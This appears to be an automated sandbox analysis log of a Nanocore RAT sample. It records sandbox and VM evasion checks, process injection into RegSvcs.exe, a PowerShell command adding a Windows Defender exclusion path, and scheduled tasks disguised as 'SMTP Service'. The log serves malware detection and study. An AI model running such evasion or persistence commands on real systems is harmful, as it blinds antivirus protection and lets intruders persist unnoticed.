      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Yara detected AntiVM3
      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.2451b94.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.2459ba0.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000004.00000002.433106476.0000000002441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.433210954.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: plugmancdht5461.exe PID: 848, type: MEMORYSTR
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: plugmancdht5461.exe, 00000004.00000002.433210954.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, plugmancdht5461.exe, 00000004.00000002.433106476.0000000002441000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
      Source: plugmancdht5461.exe, 00000004.00000002.433210954.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, plugmancdht5461.exe, 00000004.00000002.433106476.0000000002441000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1180Thread sleep time: -240000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exe TID: 196Thread sleep time: -33428s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exe TID: 1868Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exe TID: 2124Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2828Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\taskeng.exe TID: 200Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2160Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 1160Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1364Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8386Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_005A410E sldt word ptr [eax]9_2_005A410E
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeThread delayed: delay time: 33428Jump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: plugmancdht5461.exe, 00000004.00000002.433106476.0000000002441000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
      Source: plugmancdht5461.exe, 00000004.00000002.433106476.0000000002441000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
      Source: plugmancdht5461.exe, 00000004.00000002.433106476.0000000002441000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
      Source: plugmancdht5461.exe, 00000004.00000002.434837360.00000000051B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
      Source: plugmancdht5461.exe, 00000004.00000002.433106476.0000000002441000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Allocates memory in foreign processes
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
      Injects a PE file into a foreign processes
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
      Adds a directory exclusion to Windows Defender
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZdNnwVcb.exe
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZdNnwVcb.exeJump to behavior
      Writes to foreign memory regions
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 420000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 422000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008Jump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\plugmancdht5461.exe C:\Users\user\AppData\Roaming\plugmancdht5461.exeJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZdNnwVcb.exeJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZdNnwVcb" /XML "C:\Users\user\AppData\Local\Temp\tmp41F1.tmpJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "SMTP Service" /xml "C:\Users\user\AppData\Local\Temp\tmpA9E2.tmpJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "SMTP Service Task" /xml "C:\Users\user\AppData\Local\Temp\tmp9E5E.tmpJump to behavior
      Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe 0Jump to behavior
      Source: C:\Windows\System32\taskeng.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe "C:\Program Files (x86)\SMTP Service\smtpsvc.exe" 0Jump to behavior
      Source: RegSvcs.exe, 00000009.00000002.694392047.0000000006C4E000.00000004.00000010.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.694332477.00000000068BE000.00000004.00000010.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.694133289.000000000609C000.00000004.00000010.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.694441123.0000000006FBE000.00000004.00000010.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.694510504.00000000074DF000.00000004.00000010.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.694448443.000000000710C000.00000004.00000010.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.694418566.0000000006DAE000.00000004.00000010.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.694496396.00000000073DC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: nO1`i1`Program Manager
      Source: RegSvcs.exe, 00000009.00000002.691150726.0000000002772000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691415902.000000000298C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691342924.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691121698.0000000002730000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691311825.00000000028A2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691644184.0000000002BEA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691172158.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691260322.000000000282B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691366029.0000000002922000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691267382.0000000002830000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager48
      Source: RegSvcs.exe, 00000009.00000002.691150726.0000000002772000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691415902.000000000298C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691342924.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691121698.0000000002730000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691311825.00000000028A2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691644184.0000000002BEA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691172158.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691638167.0000000002BE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691260322.000000000282B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691366029.0000000002922000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691267382.0000000002830000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
      Source: RegSvcs.exe, 00000009.00000002.691415902.000000000298C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeQueries volume information: C:\Users\user\AppData\Roaming\plugmancdht5461.exe VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\692ae41749625908a626fd813aa21688\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Program Files (x86)\SMTP Service\smtpsvc.exe VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\692ae41749625908a626fd813aa21688\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Program Files (x86)\SMTP Service\smtpsvc.exe VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\692ae41749625908a626fd813aa21688\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct

      Stealing of Sensitive Information

      barindex
      Yara detected Nanocore RAT
      Source: Yara matchFile source: 9.2.RegSvcs.exe.5a4629.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.364b35e.19.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.5a0000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.3650194.17.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.5a0000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
